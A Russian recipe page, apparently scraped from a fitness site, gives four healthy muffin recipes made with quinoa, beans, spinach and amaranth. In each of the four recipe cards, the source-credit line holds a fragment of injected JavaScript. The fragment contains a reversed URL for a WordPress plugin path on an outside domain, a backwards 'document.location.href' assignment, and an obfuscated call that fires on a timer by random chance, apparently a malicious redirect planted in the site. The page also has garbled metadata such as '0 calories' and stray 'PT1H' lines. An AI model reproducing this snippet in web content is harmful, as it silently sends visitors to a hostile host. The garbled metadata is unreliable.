Полезные маффины: 4 вкусных рецепта

Ароматные, мягкие маффины — это не обязательно сахар, масло и мука. Их можно приготовить и из более здоровых продуктов. Выглядят такие полезные маффины очень оригинально. Кроме того, маленькие порции помогают контролировать количество еды, а значит, и потребляемых калорий.

Итальянские кексы

Полезные маффины: 4 вкусных рецепта. Изображение номер 1

Фото: hummusapien.com

Полезные маффины: 4 вкусных рецепта

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

12

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

киноа

1/2 стакана

овощной бульон или вода

1 стакан

яйца

2 шт.

миндальная мука

2 ст. л.

натёртая моцарелла

1/4 стакана

натёртый пармезан

1/4 стакана

помидоры

200 г

свежий базилик

1 веточка

чеснок

2-3 зубчика

соль

1/4 ч. л.

  1. Тщательно промойте киноа и сложите в сотейник. Залейте крупу бульоном или водой, доведите до кипения, а затем тушите на медленном огне около 15 минут, пока вся жидкость не впитается. Остудите.
  2. Взбейте яйца, измельчите чеснок. Смешайте яйца, сыр, чеснок, муку и соль, добавьте крупу, нарезанные кубиками помидоры и измельчённый базилик и хорошо перемешайте тесто.
  3. Распределите тесто по формочкам для кексов, смазанным маслом, и выпекайте в духовке при температуре 170 градусов около 25 минут. Подавайте маффины тёплыми.

Мексиканские маффины

Полезные маффины: 4 вкусных рецепта. Изображение номер 2

Полезные маффины: 4 вкусных рецепта

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 ЧАСОВ 15 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

24

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

сухая фасоль

40 г

киноа

1 стакан

вода

1,5 стакана

натёртый чеддер

120 г

яйца

2 шт.

молоко

1 ст.

соус сальса

1/2 стакана

чили

1 шт.

кинза

3 веточки

тмин

1 ч. л.

соль и перец

по вкусу

  1. Предварительно замочите фасоль на 9 часов (это можно сделать на ночь). Затем варите фасоль один час.
  2. Залейте киноа 1,5 стаканами воды, поставьте на медленный огонь и варите 15—20 минут.
  3. Смешайте киноа, фасоль, соус сальса, мелко нарезанный чили, кинзу, тмин, чеддер, соль и перец.
  4. Взбейте яйца и молоко, залейте смесью киноа и овощи. Распределите получившееся тесто по формочкам (в них предварительно можно положить специальные бумажные вкладыши для кексов) и выпекайте 15—17 минут в духовке, разогретой до 180 градусов.

Кексы со шпинатом

Полезные маффины: 4 вкусных рецепта. Изображение номер 3

Полезные маффины: 4 вкусных рецепта

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

10

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

свежий шпинат

300 г

рикотта или творог

100 г

натёртый пармезан

1/2 стакана

яйца

2 шт.

белый лук

1 шт.

чеснок

2 зубчика

паста мисо

1 ст. л.

тимьян

1 ч. л.

лимонная цедра

1 ч. л.

мускатный орех

1/4 ч. л.

паприка

1/4 ч. л.

кунжут

3 ст. л.

  1. Измельчите шпинат. Тщательно перемешайте его с рикоттой или творогом, пармезаном, взбитыми яйцами, мелко нарезанным луком, чесноком и остальными приправами, кроме кунжута.
  2. Выложите смесь в формочки и выпекайте 15—20 минут в духовке при температуре 200 градусов.
  3. Перед подачей посыпьте кексы кунжутом.

Амарантовые маффины

Полезные маффины: 4 вкусных рецепта. Изображение номер 4

Фото: kiipfit.com

Полезные маффины: 4 вкусных рецепта

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

10

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

шпинат

100 г

миндальная мука

1 ст.

зёрна амаранта

1 ст.

яйца

4 шт.

разрыхлитель

1 ч. л.

льняное или оливковое масло

1 ст. л.

соль и перец

по вкусу

  1. Приготовьте амарант: варите крупу в воде в соотношении 1:2,5 в течение 20—30 минут.
  2. Нарежьте шпинат и смешайте его с варёным амарантом, миндальной мукой, солью, перцем, разрыхлителем.
  3. Взбейте яйца с ложкой масла, влейте их в амарантовую смесь и тщательно перемешайте.
  4. Распределите тесто по формочкам и выпекайте амарантовые маффины в духовке при температуре 170 градусов в течение 25 минут.
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector